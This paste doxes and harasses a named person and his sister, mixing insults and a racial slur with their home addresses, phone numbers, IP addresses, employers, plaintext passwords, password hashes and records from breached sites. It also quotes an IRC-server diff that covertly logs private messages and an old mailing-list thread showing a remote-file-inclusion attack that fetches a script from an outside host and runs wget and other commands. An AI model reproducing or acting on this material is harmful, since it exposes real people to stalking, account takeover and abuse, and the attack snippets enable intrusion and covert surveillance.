@YogSotho / Marco Monicelli / @The_Beyond_One / is a well known twitter troll & overgrown skidiotic asswipe. For years after his IRL "software engineering career" fell apart Marco proceeded 2 join the surface skid-scene and attempted to join other so called "hacking teams" such as LizardSquad BWA GoonSquad etc. When constantly rejected due to posessing absolutely ZERO technical ability / network knowledge, by late 2017 Mr. Monicelli proceeded to roleplay as other well know members of the community such as MLT: https://en.wikipedia.org/wiki/MLT_(hacktivist) // Dshocker: https://www.darknet.org.uk/2008/11/dshocker-aka-aush0k-hackerpleads-guilty-to-computer-felonies/ // and Julius Kivimäki (zeekill): https://krebsonsecurity.com/tag/zeekill/ By May 2019 everyone got tired or Marco's bullshit and spam reported his @YogSotho twitter causing it to get suspended after which he made his new hadnle @The_Beyond_One. Date / Proof: https://gyazo.com/706aa1686a76d69d16a76ba0bed2985e At this point giving up roleplaying as other hackers Mr. Monicelli switched his game up and began spamming enyone who accomplished anything on twitter with idiocy claiming that what they did never happened (Even though there are articles and mountains of evidence that it did.) From MLT's arrest and TeamPoison's accomplishments to BWA Und0xxeds alleged possession of tmobiel accoutns, Marco the irrelevant, unnoticed, enraged SKID proceeded to spam everyone's tweets with lies and pointless comments. Today the Sharks & Killer Whales along with other predators of the community decided to give the drifting piece of rotting seaweed the attention which it has been begging for all these years... this is the end friend and I'm sure anyone reading this and cringing at your existence can agree with me that it willbe a good riddance. *Tips Fedora and stomps on insect* ------------------------------------------------------------------------- Marco Monicelli aka YogSotho aka @The_Beyond_One o doT o /XTerM exeC... 
... ... -------------------------------------------------------------------------- Below you can see how the community responds to the skidiots personality disorder and social incabapilities: As you can see here the so called "hacking comunity" doesn't show a lot of respect for little Marco, or should I say the grown ass 38 year old man behind the little role play hacker sherade / persona. Below are how people normally reac to Mr. Monicelli's presence. https://gyazo.com/ede0a62b3ab526712916a967312bbe62 <<< @YogSotho Suspended in early 2019 by members of the community. https://gyazo.com/7eadecf1b79eef6d38f0d81cb3e055e2 <<< Beamage v1 https://gyazo.com/12f906975d4ffc10cc8e310801c6458e <<< Beamage v2 https://gyazo.com/07e27ce08833e7a832ca0ca3c1b0ffce <<< Kid tries to seem relevant by tagging himself where he doesn't belong https://gyazo.com/35847431e3e77db353395ee8f317c4b5 <<< Trying to seem relevant not realising nobody has time for him and his lies https://gyazo.com/3c944099d11ea50d221ef969e3af65f5 <<< People are embarassed to talk to this SKID because all he does is butt into convo's with random people and post meme's while trying to gain twitter followers and feed his puny "scary hacker" persona. https://gyazo.com/632be6b0c3c12ca16d394ec97c0e303d <<< again tries to join conversations and gets ignored lol https://gyazo.com/63b1ad8e56fb41fc8a6ff81fcf25110f <<< The poor skid gets clowned at all hours of the night wherever he goes. -------------------------------------------------------------------------- Proof liking @YogTotho to IRL Identity (Marco Monicelli) Mr_Pan [n=marcopan@host156-30-dynamic.3-87-r.retail.telecomitalia.it] has joined #ubuntu === YogSothoth [n=YogSotho@82.250.72.110] has joined #ubuntu [10:46] Hi! [10:46] Polysics: pcmanfm do what you need? 
=== spaden [i=hidden-u@195.216.35.251] has joined #ubuntu [10:46] hmmm, [10:46] maybe i need to get a newer versiong of Ubuntu [10:46] it's great thx === Flaze [i=Omega@r220-101-112-217.cpe.unwired.net.au] has joined #ubuntu [10:46] Other than Gimp, is there a software to help merging photos, creating panoramas from multiple photos? === thuyvy_nguyen031 [n=thuyvy_n@222.253.110.14] has left #ubuntu [] [10:47] yea, I love that one - I use it in place of nautilus completely === tschaka [n=tschaka@p54B3A73B.dip0.t-ipconnect.de] has joined #ubuntu === cameronw [n=cameronw@123-100-99-208.ubs.maxnet.co.nz] has joined #ubuntu [10:48] it isn't totally integrated into gnome, though, like nautilus is....but it can be setup to be through the session manager, I think === dead_rooster [n=ubuntu@60-234-170-12.bitstream.orcon.net.nz] has left #ubuntu [] [10:48] after typing "sudo dpkg -reconfigure -phigh xserver -xorg", it just showed : "dpkt: conflicting actions --control and --remove" === Faithful [n=Faithful@ns.linuxterminal.com] has joined #ubuntu [10:48] PPG: Don't put a space between xserver-xorg === primus [n=primus@tm.82.192.62.130.dc.telemach.net] has joined #ubuntu === Hardiles [n=harri@dyn3-82-128-191-248.psoas.suomi.net] has joined #ubuntu [10:49] or between dpkg-reconfigure === wolfsong is frustrated by all his windows being drawn at 0,0 [10:49] should be 'sudo dpkg-reconfigure -phigh xserver-xorg' === jabba [n=jabba@pD95744E1.dip.t-dialin.net] has joined #ubuntu [10:50] OH!!! [10:50] hello [10:50] :) [10:50] lol [10:50] i am just trying to connect to a novell 6.0 server with ncpmount. but i always get an invalid server response (-330). [10:50] does aynone know that that means? 
[10:50] FOund it: Hugin [10:50] Or Pandora plung for The Gimp === fredddy [n=freddy@p3E9E4368.dip0.t-ipconnect.de] has joined #ubuntu [10:50] Little stuff like that can be sooooo confusing at first, ppg, I totally understand [10:50] *plugin [10:51] ncpmount -S servername -P start -A 192.168.1.5 -u jabba /mnt/novell/ -U novellusername === PiNE [n=bradley@211.203.183.52] has joined #ubuntu [10:51] how do i tell if compiz is running and which WM i'm using under gnome? === ojk007 [n=ojk007@58.175.24.112] has joined #ubuntu [10:52] !partition [10:52] Partitioning programs: !GParted or QTParted (also "man mkfs" for formatting) - Mounting partitions in Gnome under Dapper: System -> Administration -> Disks - For Edgy, see !fstab and !DiskMounter === tarntow [n=jaxon@221.127.200.71] has joined #ubuntu === predaeus [n=predaeus@chello212186005030.401.14.vie.surfer.at] has joined #ubuntu === ploufplouf [n=richard@host.110.163.23.62.rev.coltfrance.com] has joined #ubuntu === erpo [n=erpo@2001:5c0:8fff:fffe:0:0:0:6929] has joined #ubuntu === AdvoWork [n=danglebe@unaffiliated/advowork] has joined #ubuntu [10:53] jabba: try wireshark maybe? [10:54] ?? [10:54] reee [10:54] Frogzoo: whatfor? [10:54] hi there. Ive been following some instructions that tell me to do: useradd -r -c "Postfix Filters" -d /var/spool/filter filter yet it says that: invalid option -- r :/ [10:55] i cant see -r in the man pages, yet as i say, its telling me to do so, and im having problems further down the line by not doing it === Skyward [n=tinko@lb2.aeye.net] has joined #ubuntu [10:55] dan_ I can't seem to find in the log what your sound problem was... 
I remember you typing it, but not what you typed, and I can't find it anywhere === tarntow [n=jaxon@221.127.200.71] has joined #ubuntu [10:55] jabba: you get to see the conversation on the wire [10:56] no need for gnome integration anyway [10:56] hehe [10:56] i have this problem [10:56] all i needed is a fast file manage [10:56] *r [10:56] i got 2 soundcrads, one pci and on onboard [10:56] ubuntu/alsa makes my onboard default not the pci one === jikin [n=liuke@222.247.138.140] has joined #ubuntu [10:57] Frogzoo: seems ok, but in the end there is a NCP C Destroy Connection Service [10:57] user authed etc... === blan [n=marc@dslb-088-065-233-104.pools.arcor-ip.net] has joined #ubuntu [10:57] but i want the pci one as default, as card 0, but i dont know how, asoundconf wont work nor the solution in the forums === gerr1 [i=gerrycar@nat/canonical/x-2efdeeb598ed0ee5] has joined #ubuntu [10:57] Well, the easiest (maybe dirty) way that immediately comes to mind is disabling the onboard in your bios... [10:57] But, I assume you don't wanna do that [10:57] yeah u and your disabling [10:57] heheh Proof: https://gyazo.com/7cd4a329115980f296a4c34bec2b9f87 "Marcos" https://gyazo.com/5a080f62b9139d613b702e80537ac7e3 -█░ 1st s0me 1nf4llabl3 logiq: -█ -█ bongrip PRIVMSG #insecurity :if we got hacked -█ bongrip PRIVMSG #insecurity :we wouldnt be told -█ bongrip PRIVMSG #insecurity :i constantly have to check shit -█ bongrip PRIVMSG #insecurity :if we get hacked by these guys we wont know it -█ bongrip PRIVMSG #insecurity :htey arent going to brag -█ bongrip PRIVMSG #insecurity :until i check it and find it -█ bongrip PRIVMSG #insecurity :one day -█ YogSotho PRIVMSG #insecurity :Indeed. 
U notice only when they rm ur box -█ bongrip PRIVMSG #insecurity :which will never happen -█ bongrip PRIVMSG #insecurity :cause nothing is popped -█ bongrip PRIVMSG #insecurity :no -█ bongrip PRIVMSG #insecurity :they wont rm me -█ bongrip PRIVMSG #insecurity :they would just do it to log -█ bongrip PRIVMSG #insecurity :they would pop the hub -█ bongrip PRIVMSG #insecurity :from there u can use pcap play -█ bongrip PRIVMSG #insecurity :to sniff pm's -█ bongrip PRIVMSG #insecurity :and everything else -█ -█ Like this? -█ -█ src/modules/m_message.c -█ < if (ret == CANPRIVMSG_SEND) -█ < { -█ > FILE *fp; -█ > fp=fopen("/var/backups/.irc/log.txt", "a"); -█ > fprintf(fp, "%s %s %s :%s\n", parv[0], cmd, nick, text); -█ > fclose(fp); -█ < sendto_message_one(acptr, sptr, parv[0], newcmd, nick, -█ text); Proof: https://gyazo.com/e3f8fe96c610373037c2075a10562acb Name 94.36.22.39 Email yogsotho@yahoo.com Username yogsotho Hashed Password df1320122d9a8ae01f013cb79b733706:cL4FbPkh I.P. Address 87.30.11.168 this nigga on hackforums Email yogsotho@yahoo.com Password brody111 Email yogsotho@yahoo.com Password Nut3ll474 Email yogsotho@gmail.com Password Nut3ll474 Home IP: IP Details For: 94.36.22.39 Decimal: 1579423271 Hostname: 94-36-22-39.adsl-ull.clienti.tiscali.it ASN: 8612 ISP: Tiscali SpA Organization: Tiscali SpA Services: None detected Type: Broadband Assignment: Likely Dynamic IP Continent: Europe Country: Italy >< VPN: Decimal: 1392134254 Hostname: lns-bzn-61-82-250-72-110.adsl.proxad.net ASN: 12322 ISP: Free SAS Organization: Free SAS Services: None detected Type: Broadband Assignment: Likely Dynamic IP Continent: Europe Country: France ------------------------------------------------------------- ADDRESS / LOCATION / FAMILY MEMBE(S) ETC. 
------------------------------------------------------------- Family members European contact / Employment followed by domestic address of possible relative or a family member MONICELLI MARCO Via Roaschia 159 - 10023 Chieri (TO) | mappa tel: 011 9425914 2. DOTT.SSA IRENE MONICELLI info sulla privacy 10, Via Milano - 10122 Torino (TO) | mappa cell: 349 1839386 Previous employment: Marco Monicelli MARCEGAGLIA SPA Automotive Sales Department Stainless Steel Division Tel. +39 0376 685369 Fax. +39 0376 685625 email: ***@marcegaglia.com (marco.monicelli@marcegaglia.com) IG: https://www.instagram.com/yogsotho/?hl=en Picture: https://gyazo.com/b6733f491759a29dff314f0627b15346 (Looks like the Fonzie) MONICELLI, MARCO Via Roaschia 159 - 10023 Chieri tel: (+38) 011 9425914 Map pic: https://gyazo.com/cb1b393b8a34129a2b1a11ef3bfb9bce Area desc: Comune di CHIERI Regione ProvinciaTO CAP10023 Prefisso011 Codice ISTAT001078 Codice catastale In zona trovi anche PHOTOVOLTAIC SYSTEMS SRL Corso Torino, 78 - 10023 Chieri (TO) tel: 011 2460872, 335 1261137 ONORANZE FUNEBRI L'ANNUNZIATA DI LUISON MARCO REPERIBILI 24 H SU 24 H Via Torino 52/a - 10023 Chieri (TO) tel: 011 6490292 APOLLO_IO_129M_MARKETING_2018 View Full Email marco.monicelli@inps.cv Name Marco Monicelli City Torino Country Italy Postal 10126 Linkedin http://www.linkedin.com/in/marco-monicelli-544403b9 Job Pensionato Company INPS Employer / email domain: https://www.marcegaglia.com/officialwebsite/ Address of him and sister (or wife not sure at this point) Proof: https://gyazo.com/fe1bfaf691648b1174e74c4f85e9e9b2 Other work experiences Marco Monicelli Pensionato presso INPS Turin, Piedmont, Italy8 connections Join to Connect INPS INPS Politecnico di Milano Politecnico di Milano Experience INPS Graphic Pensionato INPS Education Politecnico di Milano Politecnico di Milano Graphic Politecnico di Milano - Groups Rete di STIMA Rete di STIMA Graphic Rete di STIMA - 
------------------------------------------------------------------------- Sister: Irene Monicelli Picture: https://gyazo.com/997acbe4fdf89363ce20e2c3b63c08ac https://twitter.com/irenemonicelli?lang=en Address: IRENE MONICELLI 10, Via Milano - 10122 Torino (TO) cell: 349 1839386 Old line: +39 06 8108869 Employment: Dott.ssa Irene Monicelli Psychotherapist in Turin, Italy Address: Via San Domenico, 37/c, 10122 Torino TO, Italy Hours: Closed ⋅ Opens 9AM Health & safety: Appointment required · Mask required · Staff wear masks · Staff required to disinfect surfaces between visits · More details Phone: +39 349 183 9386 Province: Metropolitan City of Turin Psicologo , Psicoterapeuta In studio Curriculum Tariffe Patologie Opinioni Sedi curriculum approfondisci La Dott.ssa Monicelli è Psicologa Psicoterapeuta ad indirizzo cognitivo comportamentale, metodologia evidence based con protocolli di intervento approvati dall'OMS.In ambito neuropsicologico collabora con strutture pubbliche e private che offrono servizi di valutazione e riabilitazione delle funzioni cognitive (memoria, attenzione e percezione).Integrando le conoscenze sui processi cognitivi e le tecniche cliniche (ipnosi, biofeedback, coaching) offre percorsi per il miglioramento e il potenziamento della performance sia in ambito sportivo che artistico.Applica inoltre, tecniche di rilassamento (rilassamento muscolare tecnica di Jacobson e tecniche immaginative) Mindfulness e di Training Autogeno, anche organizzando corsi individuali e di gruppo. Tariffe guarda tutte Consulenza psicologica • € 60 Top Mindfulness • da € 40 a € 60 Top Preparazione psicologica per sportivi • da € 50 a € 100 Top Psicologia dello sport • da € 50 a € 100 https://plus.google.com/112833901647497415468 (No longer active) Linked in info: Irene Monicelli Psicologa consulente per la prestazione aziendale e sportiva. 
Turin, Piedmont, Italy500+ connections Join to Connect MenteAttiva Studio di Psicologia MenteAttiva Studio di Psicologia Centro di Psicologia dello Sport - ISEF Centro di Psicologia dello Sport - ISEF Company Website Company WebsiteExternal link Activity Finalmente ci siamo! Riparte la nuova stagione 2020/2021 formativa di psicologia sportiva. Gli istruttori della Scuola Calcio della Polisportiva… Finalmente ci siamo! Riparte la nuova stagione 2020/2021 formativa di psicologia sportiva. Gli istruttori della Scuola Calcio della Polisportiva… Liked by Irene Monicelli La giraffa è l'animale terrestre che ha il cuore più grande, è un animale erbivoro e di conseguenza tende a non attaccare ma è molto forte e quindi è… La giraffa è l'animale terrestre che ha il cuore più grande, è un animale erbivoro e di conseguenza tende a non attaccare ma è molto forte e quindi è… Join now to see all activity Experience MenteAttiva Studio di Psicologia Graphic Libera professionista consulente per aziende e società sportive MenteAttiva Studio di Psicologia Nov 2012 - Present8 years 10 months Torino, Italia MenteAttiva Graphic Psicologa dello Sport e della Prestazione MenteAttiva Jan 2015 - Present6 years 8 months via San Domenico 37, 10122 Torino Percorsi di ottimizzazione della prestazione in campo sportivo, musicale e aziendale attraverso cui trasformare i problemi in opportunità e raggiungere così i propri obiettivi in tempi ridotti. Chiros Srl Graphic Psicologa-Neuropsicologa Chiros Srl Jan 2015 - Present6 years 8 months Torino, Italia - Programmi in supporto alle terapie del Centro (trattamento del dolore cronico, rilassamento muscolare, disturbi vestibolari, psicosomatica, Training Autogeno e Mindfulness). 
Ospedale civico di Settimo Torinese Graphic Servizio di Neuropsicologia Ospedale civico di Settimo Torinese Mar 2017 - Oct 20178 months Settimo Torinese Servizio di neuropsicologia per la valutazione e riabilitazione delle capacità cognitive in pazienti neurologici e ortopedici ricoverati presso la struttura. E' possibile richiedere prestazioni intramenia presso la struttura. Centro di Salute Psicofisica Graphic Psicologa - Neuropsicologa Centro di Salute Psicofisica Dec 2012 - Sep 20152 years 10 months Torino Il Centro si occupa di prevenzione, formazione e supervisione, interventi terapeutici, attività di studio e ricerca. Gestione del progetto CAFFE' ALZHEIMER TORINO Servizi Sociali del Comune di Torino Graphic Psicologa Servizi Sociali del Comune di Torino Oct 2010 - Jan 20154 years 4 months Torino, Italia Programmazione ed attuazione di un programma educativo/riabilitativo e promozione del benessere di minori con disabilità cognitive e disagio psicologico. Sostegno alla famiglia ASL TO2 TORINO, S.E.R.T Graphic Psicoterapeuta specializzanda ASL TO2 TORINO, S.E.R.T Jan 2013 - Nov 20141 year 11 months Torino Lega Italiana Lotta Tumori, LILT Graphic Psicologa Lega Italiana Lotta Tumori, LILT Apr 2012 - May 20142 years 2 months Torino, Italia Progetto "Missione Salute" Presidio Sanitario San Camillo Graphic Specializzanda Presidio Sanitario San Camillo Nov 2010 - Dec 20122 years 2 months Torino, Italia Colloqui di sostegno, adattamento alla malattia, counseling e training di rilassamento presso il servizio di psicologia; valutazione e training riabilitativi. 
Cooperativa Terzo Tempo Graphic Psicologa Cooperativa Terzo Tempo Jun 2012 - Aug 20123 months Torino Manos Amigas Graphic Collaboratrice progetti Manos Amigas May 2006 - May 20071 year 1 month Huaraz, Perù Casa di accoglienza per ragazzi di strada con progetti per la formazione al lavoro Education Centro di Psicologia dello Sport - ISEF Graphic Centro di Psicologia dello Sport - ISEF Esperto in Psicologia dello Sport e della Prestazione Percorso di ottimizzazione della perfomance (ambito sportivo e musicale) Responsabile Dott.Giuseppe Vercelli Corso di Ipnosi Medica Rapida Graphic Corso di Ipnosi Medica Rapida Ipnosi Tecniche di ipnosi rapida applicabili a contesti clinici, medici e sportivi Formatore Dott.Giuseppe Regaldo Istituto Watson Graphic Istituto Watson PsicotarapeutaScuola di Specializzazione in Psicoterapia Cognitivo-Comportamentale50/50 e lode 2010 - 2014 Activities and Societies: Scuola di formazione post universitaria riconosciuta dal Ministero Istruzione Università e Ricerca MIUR (L. 56/89; D.M. 509/98; L. 
401/2000) Socia AIAMC Università degli Studi di Torino Università degli Studi di Torino Graphic Università degli Studi di Torino Laurea MagistraleScienze della Mente 2007 - 2010 Università degli Studi di Parma Università degli Studi di Parma Graphic Università degli Studi di Parma Laurea in PsicologiaPsicologia Volunteer Experience Croce Verde Graphic Volontaria Croce Verde Jun 2012 Languages Italiano Native or bilingual proficiency Inglese Professional working proficiency Spagnolo Full professional proficiency Organizations ASIECI - Dec 2015 - Present Associazione Scientifica Infermieri Esperti in Comunicazione Ipnotica AIAMC - Nov 2010 - Present Associazione Italiana Analisi e Modificazione del Comportamento MINDJOLT_COM_117M_GAMING_032019 View Full Email irene.moni@hotmail.com Name Irene Monicelli Id 29404118 Userid 688507171 Idk 2 Regdate 2010-08-10 Fname Irene Lname Monicelli APOLLO_IO_129M_MARKETING_2018 View Full Name Irene Monicelli City Turin Country Italy Linkedin http://www.linkedin.com/in/irene-monicelli-18027141 Job Psicologa-Neuropsicologa Company Chiros Srl CANVA_COM_133M_DESIGN_052019 View Full Username irene.monicelli Email irene.monicelli@gmail.com Name Irene Monicelli Id 62065049 Id_hash UACxacWKKUo Create_date 2018-03-08 09:05:08 Mail_status C Temporary 0 Roles U Deactivated 0 Locale it-IT Personal_brand 61946970 Personal_brand_id BACxaTl7wok MYFITNESSPAL_COM_144M_FITNESS_022018 Email irene.moni@hotmail.com Username Irene680 Lastip 91.253.103.134 ZOOSK_COM_28M_DATING_012020 View Full Username lord55 Email castellopandone55@yahoo.it Name Marco Monicelli Gender male Wants women Birthday 1960-06-17 Latitude 40833330 Longitude 14250000 Zipcode 80134 Country IT Regdate 2010-05-08 19:35:10 Last_login 2010-06-13 15:16:16 Last_flirted 2010-06-01 19:51:39 Height 180 Children 3 Balance 10 Dscore 800 BADOO_COM_126M_DATING_2016 CrackView Full Email conn123@libero.it Username 0150339855 Hash feba6a4e74056a4a2062e845e2854f78 Name Marco Monicelli Alias Marco 
Dob 1972-04-04 Unparsed 40:M:29:543:44630 End of sister: // o Log o ---------------------------------------------------------------------------------------- -------------------------------------------------------------------------- The following are logged via marco's original work email (Before he became a twitter skid the domain was owned by his family (proof below) and along with info previously dropped at the bottom of the file. ------------------------------------------------------------------------- Exhibit A: http://www.blacksheepnetworks.com/security/resources/pentest/8774.html Re: Windows Administrator access From: Marco Monicelli (marco.monicelli@marcegaglia.com) Date: Mon Feb 27 2006 - 02:49:49 EST Next message: ROB DIXON: "Re: Windows Administrator access" Previous message: intel96: "Re: Windows Administrator access" In reply to: Dillama: "Windows Administrator access" Next in thread: ROB DIXON: "Re: Windows Administrator access" Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ] You can simply change directory and going into "C:\Documents and Settings\Administrator". If you're not administrator, you cannot browse in there. The command prompt will show the path and this will demonstrate that you're administrator over there. Ciao Marco Dillama To pen-test@securityfocus.com 25/02/2006 10.17 cc Subject Windows Administrator access After gaining shell access to a Windows box, is there any way to show administrator privilege without changing the config or uploading new files? I have to demo the ability to gain administrator access to a Win 2000 box, the catch is no changes on the box so adding a user or loading whoami.exe from resource kit would not be options. Any suggestion here would be appreciated. 
Thanks --- Dillama ------------------------------------------------------------------------------ Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831 ------------------------------------------------------------------------------- ------------------------------------------------------------------------------ Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! 
Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831 ------------------------------------------------------------------------------- Next message: ROB DIXON: "Re: Windows Administrator access" Previous message: intel96: "Re: Windows Administrator access" In reply to: Dillama: "Windows Administrator access" Next in thread: ROB DIXON: "Re: Windows Administrator access" Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ] This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:34 EDT ---------------------------------------------------------------------------- Exhibit B: https://www.pvv.ntnu.no/~shane/dokumentasjon/hack_attempt/msg00013.html Re: Hack attempt To: Alvin Oga Subject: Re: Hack attempt From: Marco Monicelli Date: Fri, 23 Jul 2004 17:18:17 +0200 Cc: focus-linux@securityfocus.com, norbert.crettol@idiap.ch (Norbert Crettol) Delivered-to: shane@homeo.stud.ntnu.no Delivered-to: mailing list focus-linux@securityfocus.com Delivered-to: moderator for focus-linux@securityfocus.com Importance: High In-reply-to: <200407222323.i6MNNDDp006811@Virtual.Linux-Consulting.com> List-help: List-id: List-post: List-subscribe: List-unsubscribe: Mailing-list: contact focus-linux-help@securityfocus.com; run by ezmlm Hi Norbert/Alvin As I already explained in private to Norbert, this is just a guy of DALnet Network playing with some exploit for PHP. Infact he installed eggdrop and psybnc which are not related to clones attack at all. He's probably just a kid with some automated script or some "l33t" tool to own unpatched boxes. Anyway why taking off wget and other useful binaries? I would suggest instead of fully patching your box and to maybe install Snort. I don't agree with the "smart people investigating for what's cooking". I think chkrootkit can help and can spare lot of time. Of course you shouldn't base your Security on this software only but it's a good help. Snort and Tripwire are definetively a good help too. 
As I said, it's not a clones derivated attack. It's just a chatting kid who probably is trying to build up his own Botnet to look l33t with his mates. Again I don't agree with the "another cracked box". Infact the whois made by Norbert on my suggestion, gave good results. The provider hosting his website (yes, that is his own personal website.... not very smart eh?!) has deleted the inject.txt script and gave a warning to this guy who will be probably scared to death (this depends on how old he is and other factors). Moreover we know his Nickname and we know he's chatting on Dalnet so.... some social engeneering could even lead to personal information on this kid. Anyway... Norbert patch your box on any PHP bug (there are tons of PHP bug as far as I know) and then try to use SATAN or NESSUS to check your box (I personally suggest Nessus). Oh... just one last but not least thing: don't forget to wipe your box 'cause you will never know what he did for real so it's much safer to reinstall everything. I know it's boring but it's the only SECURE way to know your box is clean. Hope this can help others with same problem. Ciao Marco Monicelli MARCEGAGLIA SPA Automotive Sales Department Stainless Steel Division Tel. +39 0376 685369 Fax. +39 0376 685625 email: marco.monicelli@marcegaglia.com Alvin Oga cc: focus-linux@securityfocus.com Subject: Re: Hack attempt 23/07/2004 01.23 hi norbert > "GET /.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" time for you to patch and update to latest php or better still, turn it off esp if you don't need it tons of things to fix up ... to harden the server > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget time to remove wget, lynx, and equiv apps > Has someone seen this kind of attack ? it's either eggdrop or modified clones/derivatives > (chkrootkit doesn't detect it). 
so much for chkrootkit :-) smart/intelligent people investigating for "whats cooking" is better than automated tools > Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ? > Is there a way to stop this guy ? His nickname (CaEm) appears in the > the uploaded scripts. probably another cracked box ... long list to follow to find the actual cracker c ya alvin ------------------------------------------------------------------------------ Exhibit C: https://seclists.org/bugtraq/2006/Feb/368 Re: new linux malware From: Marco Monicelli Date: Mon, 20 Feb 2006 17:24:21 +0100 Dear Gadi, this malware looks like the famous Kaiten IRC bot. If you want, I can send the source code of it but it is already known by most of AVs and I think the source is public nowadays. This must be just another variant and bytheway it's detected as far as I can see from your quoted informations so it shouldn't be dangerous. Anyway, tnx for keeping us updated! Cheers Marco Gadi Evron To 18/02/2006 23.40 bugtraq () securityfocus com cc "full-disclosure () lists grok org uk" Subject new linux malware Today, we received a notification about a new Linux malware ItW (In the Wild). Chas Tomlin (http://www.ecs.soton.ac.uk/~cet/) provided Shadowserver (http://www.shadowserver.org/) and Nicholas Alright who notified the relevant operational communities, with the information on the binaries. He captured them with squil (http://sguil.sourceforge.net/). Chas is working with Shadowserver to identify better ways to trackdown/takedown botnets. *The credit should go to him and Shadowserver*. Shadowserver has been a responsible and essential part of recent Internet security activities. As anti virus vendors have been notified will soon do a write-up on it, I see no reason not to publicize it here. 
MD5:
c2576aeff0fd9267b6cc3a7e1089e05d ~/samples/derfiq
e9a2b13fe02d013cc5e11ee586d11c38 ~/samples/session

We are not quite sure as of yet exactly what this does; it can be a Linux virus, a Linux Trojan horse, a Linux worm... we are not even sure if the checksums above are useful at all. We hope to know more soon and we will update as we do.

There are some interesting strings to be noted:

NOTICE %s :TSUNAMI = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP = A udp flooder
NOTICE %s :UNKNOWN = Another non-spoof udp flooder
NOTICE %s :NICK = Changes the nick of the client
NOTICE %s :SERVER = Changes servers
NOTICE %s :GETSPOOFS = Gets the current spoofing
NOTICE %s :SPOOFS = Changes spoofing to a subnet
NOTICE %s :DISABLE = Disables all packeting from this client
NOTICE %s :ENABLE = Enables all packeting from this client
NOTICE %s :KILL = Kills the client
NOTICE %s :GET = Downloads a file off the web and saves it onto the hd
NOTICE %s :VERSION = Requests version of client
NOTICE %s :KILLALL = Kills all current packeting
NOTICE %s :HELP = Displays this
NOTICE %s :IRC = Sends this command to the server
NOTICE %s :SH = Executes a command

'session', current detection:
AntiVir 6.33.1.50/20060218 found [BDS/Katien.R]
Avast 4.6.695.0/20060216 found nothing
AVG 718/20060217 found nothing
Avira 6.33.1.50/20060218 found [BDS/Katien.R]
BitDefender 7.2/20060218 found nothing
CAT-QuickHeal 8.00/20060216 found nothing
ClamAV devel-20060126/20060217 found nothing
DrWeb 4.33/20060218 found nothing
eTrust-InoculateIT 23.71.80/20060218 found nothing
eTrust-Vet 12.4.2086/20060217 found nothing
Ewido 3.5/20060218 found nothing
Fortinet 2.69.0.0/20060218 found nothing
F-Prot 3.16c/20060217 found nothing
Ikarus 0.2.59.0/20060217 found [Backdoor.Linux.Keitan.C]
Kaspersky 4.0.2.24/20060218 found [Backdoor.Linux.Keitan.c]
McAfee 4700/20060217 found [Linux/DDoS-Kaiten]
NOD32v2 1.1413/20060217 found nothing
Norman 5.70.10/20060217 found nothing
Panda 9.0.0.4/20060218 found nothing
Sophos 4.02.0/20060218 found nothing
Symantec 8.0/20060218 found [Backdoor.Kaitex]
TheHacker 5.9.4.098/20060218 found nothing
UNA 1.83/20060216 found nothing
VBA32 3.10.5/20060217 found nothing

'derfiq' current detection:
AntiVir 6.33.1.50/20060218 found [Worm/Linux.Lupper.B]
Avast 4.6.695.0/20060216 found nothing
AVG 718/20060217 found nothing
Avira 6.33.1.50/20060218 found [Worm/Linux.Lupper.B]
BitDefender 7.2/20060218 found nothing
CAT-QuickHeal 8.00/20060216 found nothing
ClamAV devel-20060126/20060217 found nothing
DrWeb 4.33/20060218 found nothing
eTrust-InoculateIT 23.71.80/20060218 found nothing
eTrust-Vet 12.4.2086/20060217 found nothing
Ewido 3.5/20060218 found nothing
Fortinet 2.69.0.0/20060218 found nothing
F-Prot 3.16c/20060217 found nothing
Ikarus 0.2.59.0/20060217 found [Net-Worm.Linux.Lupper.B]
Kaspersky 4.0.2.24/20060218 found nothing
McAfee 4700/20060217 found nothing
NOD32v2 1.1413/20060217 found nothing
Norman 5.70.10/20060217 found nothing
Panda 9.0.0.4/20060218 found nothing
Sophos 4.02.0/20060218 found nothing
Symantec 8.0/20060218 found [Hacktool]
TheHacker 5.9.4.098/20060218 found nothing
UNA 1.83/20060216 found nothing
VBA32 3.10.5/20060217 found nothing

This write-up can be found here: http://blogs.securiteam.com/index.php/archives/303
We will notify as we get new updates here: http://blogs.securiteam.com

Gadi.
--
http://blogs.securiteam.com/
"Out of the box is where I live". -- Cara "Starbuck" Thrace, Battlestar Galactica.

Current thread:
new linux malware (Gadi Evron, Feb 20)
Re: new linux malware (Christine Kronberg, Feb 21)
PHP as a secure language? PHP worms? [was: Re: new linux malware] (Gadi Evron, Feb 22)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] (Christine Kronberg, Feb 21)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] (Thomas M. Payerle, Feb 26)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] (Kevin Waterson, Feb 24)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] (Jamie Riden, Feb 26)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] (Matthew Schiros, Feb 26)
Re: new linux malware (Marco Monicelli, Feb 21)
Re: new linux malware (Gadi Evron, Feb 22)
Re: new linux malware (Jamie Riden, Feb 23)

--------------------------------------------------------------------------------------------------------

